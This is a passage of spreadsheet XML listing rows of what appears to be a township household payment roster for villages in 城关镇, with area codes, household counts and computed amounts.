        <v>425</v>
      </c>
      <c r="E74" s="14" t="s">
        <v>419</v>
      </c>
      <c r="F74" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G74" s="14">
        <v>1</v>
      </c>
      <c r="H74" s="14">
        <v>340</v>
      </c>
      <c r="I74" s="14">
        <f t="shared" si="1"/>
        <v>340</v>
      </c>
      <c r="J74" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K74" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="75" ht="23" customHeight="1" spans="1:11">
      <c r="A75" s="13" t="s">
        <v>426</v>
      </c>
      <c r="B75" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C75" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D75" s="14" t="s">
        <v>427</v>
      </c>
      <c r="E75" s="14" t="s">
        <v>428</v>
      </c>
      <c r="F75" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G75" s="14">
        <v>1</v>
      </c>
      <c r="H75" s="14">
        <v>340</v>
      </c>
      <c r="I75" s="14">
        <f t="shared" si="1"/>
        <v>340</v>
      </c>
      <c r="J75" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K75" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="76" ht="23" customHeight="1" spans="1:11">
      <c r="A76" s="13" t="s">
        <v>429</v>
      </c>
      <c r="B76" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C76" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D76" s="14" t="s">
        <v>430</v>
      </c>
      <c r="E76" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F76" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G76" s="14">
        <v>1</v>
      </c>
      <c r="H76" s="14">
        <v>340</v>
      </c>
      <c r="I76" s="14">
        <f t="shared" si="1"/>
        <v>340</v>
      </c>
      <c r="J76" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K76" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="77" ht="23" customHeight="1" spans="1:11">
      <c r="A77" s="13" t="s">
        <v>431</v>
      </c>
      <c r="B77" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C77" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D77" s="14" t="s">
        <v>432</v>
      </c>
      <c r="E77" s="14" t="s">
        <v>408</v>
      </c>
      <c r="F77" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G77" s="14">
        <v>1</v>
      </c>
      <c r="H77" s="14">
        <v>340</v>
      </c>
      <c r="I77" s="14">
        <f t="shared" si="1"/>
        <v>340</v>
      </c>
      <c r="J77" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K77" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="78" ht="23" customHeight="1" spans="1:11">
      <c r="A78" s="13" t="s">
        <v>433</v>
      </c>
      <c r="B78" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C78" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D78" s="14" t="s">
        <v>434</v>
      </c>
      <c r="E78" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F78" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G78" s="14">
        <v>1</v>
      </c>
      <c r="H78" s="14">
        <v>340</v>
      </c>
      <c r="I78" s="14">
        <f t="shared" si="1"/>
        <v>340</v>
      </c>
      <c r="J78" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K78" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="79" ht="23" customHeight="1" spans="1:11">
      <c r="A79" s="13" t="s">
        <v>436</v>
      </c>
      <c r="B79" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C79" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D79" s="14" t="s">
        <v>437</v>
      </c>
      <c r="E79" s="14" t="s">
        <v>438</v>
      </c>
      <c r="F79" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G79" s="14">
        <v>1</v>
      </c>
      <c r="H79" s="14">
        <v>420</v>
      </c>
      <c r="I79" s="14">
        <f t="shared" si="1"/>
        <v>420</v>
      </c>
      <c r="J79" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K79" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="80" ht="23" customHeight="1" spans="1:11">
      <c r="A80" s="13" t="s">
        <v>439</v>
      </c>
      <c r="B80" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C80" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D80" s="14" t="s">
        <v>440</v>
      </c>
      <c r="E80" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F80" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G80" s="14">
        <v>1</v>
      </c>
      <c r="H80" s="14">
        <v>340</v>
      </c>
      <c r="I80" s="14">
        <f t="shared" si="1"/>
        <v>340</v>
      </c>
      <c r="J80" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K80" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="81" ht="23" customHeight="1" spans="1:11">
      <c r="A81" s="13" t="s">
        <v>441</v>
      </c>
      <c r="B81" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C81" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D81" s="14" t="s">
        <v>442</v>
      </c>
      <c r="E81" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F81" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G81" s="14">
        <v>1</v>
      </c>
      <c r="H81" s="14">
        <v>340</v>
      </c>
      <c r="I81" s="14">
        <f t="shared" si="1"/>
        <v>340</v>
      </c>
      <c r="J81" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K81" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="82" ht="23" customHeight="1" spans="1:11">
      <c r="A82" s="13" t="s">
        <v>443</v>
      </c>
      <c r="B82" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C82" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D82" s="14" t="s">
        <v>444</v>
      </c>
      <c r="E82" s="14" t="s">
        <v>445</v>
      </c>
      <c r="F82" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G82" s="14">
        <v>2</v>
      </c>
      <c r="H82" s="14">
        <v>300</v>
      </c>
      <c r="I82" s="14">
        <f t="shared" si="1"/>
        <v>600</v>
      </c>
      <c r="J82" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K82" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="83" ht="23" customHeight="1" spans="1:11">
      <c r="A83" s="13" t="s">
        <v>446</v>
      </c>
      <c r="B83" s="14" t="str">
        <f>B82</f>
        <v>城关镇</v>
      </c>
      <c r="C83" s="14" t="str">
        <f>C82</f>
        <v>北外村</v>
      </c>
      <c r="D83" s="13" t="s">
        <v>447</v>
      </c>
      <c r="E83" s="13" t="s">
        <v>448</v>
      </c>
      <c r="F83" s="14" t="str">
        <f>F82</f>
        <v>4113210102</v>
      </c>
      <c r="G83" s="14"/>
      <c r="H83" s="14"/>
      <c r="I83" s="14"/>
      <c r="J83" s="14"/>
      <c r="K83" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="84" ht="23" customHeight="1" spans="1:11">
      <c r="A84" s="13" t="s">
        <v>449</v>
      </c>
      <c r="B84" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C84" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D84" s="14" t="s">
        <v>450</v>
      </c>
      <c r="E84" s="14" t="s">
        <v>451</v>
      </c>
      <c r="F84" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G84" s="14">
        <v>1</v>
      </c>
      <c r="H84" s="14">
        <v>340</v>
      </c>
      <c r="I84" s="14">
        <f t="shared" ref="I84:I90" si="2">H84*G84</f>
        <v>340</v>
      </c>
      <c r="J84" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K84" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="85" ht="23" customHeight="1" spans="1:11">
      <c r="A85" s="13" t="s">
        <v>452</v>
      </c>
      <c r="B85" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C85" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D85" s="14" t="s">
        <v>453</v>
      </c>
      <c r="E85" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F85" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G85" s="14">
        <v>1</v>
      </c>
      <c r="H85" s="14">
        <v>340</v>
      </c>
      <c r="I85" s="14">
        <f t="shared" si="2"/>
        <v>340</v>
      </c>
      <c r="J85" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K85" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="86" ht="23" customHeight="1" spans="1:11">
      <c r="A86" s="13" t="s">
        <v>454</v>
      </c>
      <c r="B86" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C86" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D86" s="14" t="s">
        <v>455</v>
      </c>
      <c r="E86" s="14" t="s">
        <v>456</v>
      </c>
      <c r="F86" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G86" s="14">
        <v>1</v>
      </c>
      <c r="H86" s="14">
        <v>340</v>
      </c>
      <c r="I86" s="14">
        <f t="shared" si="2"/>
        <v>340</v>
      </c>
      <c r="J86" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K86" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="87" ht="23" customHeight="1" spans="1:11">
      <c r="A87" s="13" t="s">
        <v>457</v>
      </c>
      <c r="B87" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C87" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D87" s="14" t="s">
        <v>458</v>
      </c>
      <c r="E87" s="14" t="s">
        <v>459</v>
      </c>
      <c r="F87" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G87" s="14">
        <v>1</v>
      </c>
      <c r="H87" s="14">
        <v>340</v>
      </c>
      <c r="I87" s="14">
        <f t="shared" si="2"/>
        <v>340</v>
      </c>
      <c r="J87" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K87" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="88" ht="23" customHeight="1" spans="1:11">
      <c r="A88" s="13" t="s">
        <v>460</v>
      </c>
      <c r="B88" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C88" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D88" s="14" t="s">
        <v>461</v>
      </c>
      <c r="E88" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F88" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G88" s="14">
        <v>1</v>
      </c>
      <c r="H88" s="14">
        <v>340</v>
      </c>
      <c r="I88" s="14">
        <f t="shared" si="2"/>
        <v>340</v>
      </c>
      <c r="J88" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K88" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="89" ht="23" customHeight="1" spans="1:11">
      <c r="A89" s="13" t="s">
        <v>462</v>
      </c>
      <c r="B89" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C89" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D89" s="14" t="s">
        <v>463</v>
      </c>
      <c r="E89" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F89" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G89" s="14">
        <v>1</v>
      </c>
      <c r="H89" s="14">
        <v>340</v>
      </c>
      <c r="I89" s="14">
        <f t="shared" si="2"/>
        <v>340</v>
      </c>
      <c r="J89" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K89" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="90" ht="23" customHeight="1" spans="1:11">
      <c r="A90" s="13" t="s">
        <v>464</v>
      </c>
      <c r="B90" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C90" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D90" s="14" t="s">
        <v>465</v>
      </c>
      <c r="E90" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F90" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G90" s="14">
        <v>2</v>
      </c>
      <c r="H90" s="14">
        <v>300</v>
      </c>
      <c r="I90" s="14">
        <f t="shared" si="2"/>
        <v>600</v>
      </c>
      <c r="J90" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K90" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="91" ht="23" customHeight="1" spans="1:11">
      <c r="A91" s="13" t="s">
        <v>466</v>
      </c>
      <c r="B91" s="14" t="str">
        <f>B90</f>
        <v>城关镇</v>
      </c>
      <c r="C91" s="14" t="str">
        <f>C90</f>
        <v>中华村</v>
      </c>
      <c r="D91" s="13" t="s">
        <v>467</v>
      </c>
      <c r="E91" s="13" t="s">
        <v>312</v>
      </c>
      <c r="F91" s="14" t="str">
        <f>F90</f>
        <v>4113210108</v>
      </c>
      <c r="G91" s="14"/>
      <c r="H91" s="14"/>
      <c r="I91" s="14"/>
      <c r="J91" s="14"/>
      <c r="K91" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="92" ht="23" customHeight="1" spans="1:11">
      <c r="A92" s="13" t="s">
        <v>468</v>
      </c>
      <c r="B92" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C92" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D92" s="14" t="s">
        <v>469</v>
      </c>
      <c r="E92" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F92" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G92" s="14">
        <v>2</v>
      </c>
      <c r="H92" s="14">
        <v>300</v>
      </c>
      <c r="I92" s="14">
        <f>H92*G92</f>
        <v>600</v>
      </c>
      <c r="J92" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K92" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="93" ht="23" customHeight="1" spans="1:11">
      <c r="A93" s="13" t="s">
        <v>470</v>
      </c>
      <c r="B93" s="14" t="str">
        <f>B92</f>
        <v>城关镇</v>
      </c>
      <c r="C93" s="14" t="str">
        <f>C92</f>
        <v>东北六组</v>
      </c>
      <c r="D93" s="13" t="s">
        <v>471</v>
      </c>
      <c r="E93" s="13" t="s">
        <v>472</v>
      </c>
      <c r="F93" s="14" t="str">
        <f>F92</f>
        <v>4113210103</v>
      </c>
      <c r="G93" s="14"/>
      <c r="H93" s="14"/>
      <c r="I93" s="14"/>
      <c r="J93" s="14"/>
      <c r="K93" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="94" ht="23" customHeight="1" spans="1:11">
      <c r="A94" s="13" t="s">
        <v>473</v>
      </c>
      <c r="B94" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C94" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D94" s="14" t="s">
        <v>474</v>
      </c>
      <c r="E94" s="14" t="s">
        <v>312</v>
      </c>
      <c r="F94" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G94" s="14">
        <v>1</v>
      </c>
      <c r="H94" s="14">
        <v>340</v>
      </c>
      <c r="I94" s="14">
        <f>H94*G94</f>
        <v>340</v>
      </c>
      <c r="J94" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K94" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="95" ht="23" customHeight="1" spans="1:11">
      <c r="A95" s="13" t="s">
        <v>475</v>
      </c>
      <c r="B95" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C95" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D95" s="14" t="s">
        <v>476</v>
      </c>
      <c r="E95" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F95" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G95" s="14">
        <v>2</v>
      </c>
      <c r="H95" s="14">
        <v>330</v>
      </c>
      <c r="I95" s="14">
        <f>H95*G95</f>
        <v>660</v>
      </c>
      <c r="J95" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K95" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="96" ht="23" customHeight="1" spans="1:11">
      <c r="A96" s="13" t="s">
        <v>477</v>
      </c>
      <c r="B96" s="14" t="str">
        <f>B95</f>
        <v>城关镇</v>
      </c>
      <c r="C96" s="14" t="str">
        <f>C95</f>
        <v>西北村</v>
      </c>
      <c r="D96" s="15" t="s">
        <v>478</v>
      </c>
      <c r="E96" s="15" t="s">
        <v>479</v>
      </c>
      <c r="F96" s="14" t="str">
        <f>F95</f>
        <v>4113210106</v>
      </c>
      <c r="G96" s="14"/>
      <c r="H96" s="14"/>
      <c r="I96" s="14"/>
      <c r="J96" s="14"/>
      <c r="K96" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="97" ht="23" customHeight="1" spans="1:11">
      <c r="A97" s="13" t="s">
        <v>480</v>
      </c>
      <c r="B97" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C97" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D97" s="14" t="s">
        <v>481</v>
      </c>
      <c r="E97" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F97" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G97" s="14">
        <v>1</v>
      </c>
      <c r="H97" s="14">
        <v>340</v>
      </c>
      <c r="I97" s="14">
        <f>H97*G97</f>
        <v>340</v>
      </c>
      <c r="J97" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K97" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="98" ht="23" customHeight="1" spans="1:11">
      <c r="A98" s="13" t="s">
        <v>482</v>
      </c>
      <c r="B98" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C98" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D98" s="14" t="s">
        <v>483</v>
      </c>
      <c r="E98" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F98" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G98" s="14">
        <v>2</v>
      </c>
      <c r="H98" s="14">
        <v>300</v>
      </c>
      <c r="I98" s="14">
        <f>H98*G98</f>
        <v>600</v>
      </c>
      <c r="J98" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K98" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="99" ht="23" customHeight="1" spans="1:11">
      <c r="A99" s="13" t="s">
        <v>485</v>
      </c>
      <c r="B99" s="14" t="str">
        <f>B98</f>
        <v>城关镇</v>
      </c>
      <c r="C99" s="14" t="str">
        <f>C98</f>
        <v>北外村</v>
      </c>
      <c r="D99" s="13" t="s">
        <v>486</v>
      </c>
      <c r="E99" s="13" t="s">
        <v>303</v>
      </c>
      <c r="F99" s="14" t="str">
        <f>F98</f>
        <v>4113210102</v>
      </c>
      <c r="G99" s="14"/>
      <c r="H99" s="14"/>
      <c r="I99" s="14"/>
      <c r="J99" s="14"/>
      <c r="K99" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="100" ht="23" customHeight="1" spans="1:11">
      <c r="A100" s="13" t="s">
        <v>487</v>
      </c>
      <c r="B100" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C100" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D100" s="14" t="s">
        <v>488</v>
      </c>
      <c r="E100" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F100" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G100" s="14">
        <v>2</v>
      </c>
      <c r="H100" s="14">
        <v>300</v>
      </c>
      <c r="I100" s="14">
        <f>H100*G100</f>
        <v>600</v>
      </c>
      <c r="J100" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K100" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="101" ht="23" customHeight="1" spans="1:11">
      <c r="A101" s="13" t="s">
        <v>489</v>
      </c>
      <c r="B101" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C101" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D101" s="13" t="s">
        <v>490</v>
      </c>
      <c r="E101" s="13" t="s">
        <v>491</v>
      </c>
      <c r="F101" s="14" t="str">
        <f>F100</f>
        <v>4113210106</v>
      </c>
      <c r="G101" s="14"/>
      <c r="H101" s="14"/>
      <c r="I101" s="14"/>
      <c r="J101" s="14"/>
      <c r="K101" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="102" ht="23" customHeight="1" spans="1:11">
      <c r="A102" s="13" t="s">
        <v>492</v>
      </c>
      <c r="B102" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C102" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D102" s="14" t="s">
        <v>493</v>
      </c>
      <c r="E102" s="14" t="s">
        <v>346</v>
      </c>
      <c r="F102" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G102" s="14">
        <v>1</v>
      </c>
      <c r="H102" s="14">
        <v>340</v>
      </c>
      <c r="I102" s="14">
        <f t="shared" ref="I102:I112" si="3">H102*G102</f>
        <v>340</v>
      </c>
      <c r="J102" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K102" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="103" ht="23" customHeight="1" spans="1:11">
      <c r="A103" s="13" t="s">
        <v>494</v>
      </c>
      <c r="B103" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C103" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D103" s="14" t="s">
        <v>495</v>
      </c>
      <c r="E103" s="14" t="s">
        <v>496</v>
      </c>
      <c r="F103" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G103" s="14">
        <v>1</v>
      </c>
      <c r="H103" s="14">
        <v>340</v>
      </c>
      <c r="I103" s="14">
        <f t="shared" si="3"/>
        <v>340</v>
      </c>
      <c r="J103" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K103" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="104" ht="23" customHeight="1" spans="1:11">
      <c r="A104" s="13" t="s">
        <v>497</v>
      </c>
      <c r="B104" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C104" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D104" s="14" t="s">
        <v>498</v>
      </c>
      <c r="E104" s="14" t="s">
        <v>499</v>
      </c>
      <c r="F104" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G104" s="14">
        <v>1</v>
      </c>
      <c r="H104" s="14">
        <v>340</v>
      </c>
      <c r="I104" s="14">
        <f t="shared" si="3"/>
        <v>340</v>
      </c>
      <c r="J104" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K104" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="105" ht="23" customHeight="1" spans="1:11">
      <c r="A105" s="13" t="s">
        <v>500</v>
      </c>
      <c r="B105" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C105" s="14" t="s">
        <v>247</v>
      </c>
      <c r="D105" s="14" t="s">
        <v>501</v>
      </c>
      <c r="E105" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F105" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G105" s="14">
        <v>1</v>
      </c>
      <c r="H105" s="14">
        <v>340</v>
      </c>
      <c r="I105" s="14">
        <f t="shared" si="3"/>
        <v>340</v>
      </c>
      <c r="J105" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K105" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="106" ht="23" customHeight="1" spans="1:11">
      <c r="A106" s="13" t="s">
        <v>503</v>
      </c>
      <c r="B106" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C106" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D106" s="14" t="s">
        <v>504</v>
      </c>
      <c r="E106" s="14" t="s">
        <v>505</v>
      </c>
      <c r="F106" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G106" s="14">
        <v>1</v>
      </c>
      <c r="H106" s="14">
        <v>340</v>
      </c>
      <c r="I106" s="14">
        <f t="shared" si="3"/>
        <v>340</v>
      </c>
      <c r="J106" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K106" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="107" ht="23" customHeight="1" spans="1:11">
      <c r="A107" s="13" t="s">
        <v>506</v>
      </c>
      <c r="B107" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C107" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D107" s="14" t="s">
        <v>508</v>
      </c>
      <c r="E107" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F107" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G107" s="14">
        <v>1</v>
      </c>
      <c r="H107" s="14">
        <v>340</v>
      </c>
      <c r="I107" s="14">
        <f t="shared" si="3"/>
        <v>340</v>
      </c>
      <c r="J107" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K107" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="108" ht="23" customHeight="1" spans="1:11">
      <c r="A108" s="13" t="s">
        <v>509</v>
      </c>
      <c r="B108" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C108" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D108" s="14" t="s">
        <v>510</v>
      </c>
      <c r="E108" s="14" t="s">
        <v>511</v>
      </c>
      <c r="F108" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G108" s="14">
        <v>1</v>
      </c>
      <c r="H108" s="14">
        <v>340</v>
      </c>
      <c r="I108" s="14">
        <f t="shared" si="3"/>
        <v>340</v>
      </c>
      <c r="J108" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K108" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="109" ht="23" customHeight="1" spans="1:11">
      <c r="A109" s="13" t="s">
        <v>512</v>
      </c>
      <c r="B109" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C109" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D109" s="14" t="s">
        <v>513</v>
      </c>
      <c r="E109" s="14" t="s">
        <v>514</v>
      </c>
      <c r="F109" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G109" s="14">
        <v>2</v>
      </c>
      <c r="H109" s="14">
        <v>300</v>
      </c>
      <c r="I109" s="14">
        <f t="shared" si="3"/>
        <v>600</v>
      </c>
      <c r="J109" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K109" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="110" ht="23" customHeight="1" spans="1:11">
      <c r="A110" s="13" t="s">
        <v>515</v>
      </c>
      <c r="B110" s="14" t="str">
        <f>B109</f>
        <v>城关镇</v>
      </c>
      <c r="C110" s="14" t="str">
        <f>C109</f>
        <v>中华村</v>
      </c>
      <c r="D110" s="13" t="s">
        <v>516</v>
      </c>
      <c r="E110" s="13" t="s">
        <v>517</v>
      </c>
      <c r="F110" s="14" t="str">
        <f>F109</f>
        <v>4113210108</v>
      </c>
      <c r="G110" s="14"/>
      <c r="H110" s="14"/>
      <c r="I110" s="14"/>
      <c r="J110" s="14"/>
      <c r="K110" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="111" ht="23" customHeight="1" spans="1:11">
      <c r="A111" s="13" t="s">
        <v>518</v>
      </c>
      <c r="B111" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C111" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D111" s="14" t="s">
        <v>519</v>
      </c>
      <c r="E111" s="14" t="s">
        <v>520</v>
      </c>
      <c r="F111" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G111" s="14">
        <v>2</v>
      </c>
      <c r="H111" s="14">
        <v>300</v>
      </c>
      <c r="I111" s="14">
        <f>H111*G111</f>
        <v>600</v>
      </c>
      <c r="J111" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K111" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="112" ht="23" customHeight="1" spans="1:11">
      <c r="A112" s="13" t="s">
        <v>521</v>
      </c>
      <c r="B112" s="14" t="str">
        <f>B111</f>
        <v>城关镇</v>
      </c>
      <c r="C112" s="14" t="str">
        <f>C111</f>
        <v>北外村</v>
      </c>
      <c r="D112" s="17" t="s">
        <v>522</v>
      </c>
      <c r="E112" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F112" s="14" t="str">
        <f>F111</f>
        <v>4113210102</v>
      </c>
      <c r="G112" s="14"/>
      <c r="H112" s="14"/>
      <c r="I112" s="14"/>
      <c r="J112" s="14"/>
      <c r="K112" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="113" ht="23" customHeight="1" spans="1:11">
      <c r="A113" s="13" t="s">
        <v>523</v>
      </c>
      <c r="B113" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C113" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D113" s="14" t="s">
        <v>524</v>
      </c>
      <c r="E113" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F113" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G113" s="14">
        <v>1</v>
      </c>
      <c r="H113" s="14">
        <v>340</v>
      </c>
      <c r="I113" s="14">
        <f>H113*G113</f>
        <v>340</v>
      </c>
      <c r="J113" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K113" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="114" ht="23" customHeight="1" spans="1:11">
      <c r="A114" s="13" t="s">
        <v>525</v>
      </c>
      <c r="B114" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C114" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D114" s="14" t="s">
        <v>526</v>
      </c>
      <c r="E114" s="14" t="s">
        <v>527</v>
      </c>
      <c r="F114" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G114" s="14">
        <v>2</v>
      </c>
      <c r="H114" s="14">
        <v>300</v>
      </c>
      <c r="I114" s="14">
        <f>H114*G114</f>
        <v>600</v>
      </c>
      <c r="J114" s="14" t="s">
        <v>224</v>
      </c>
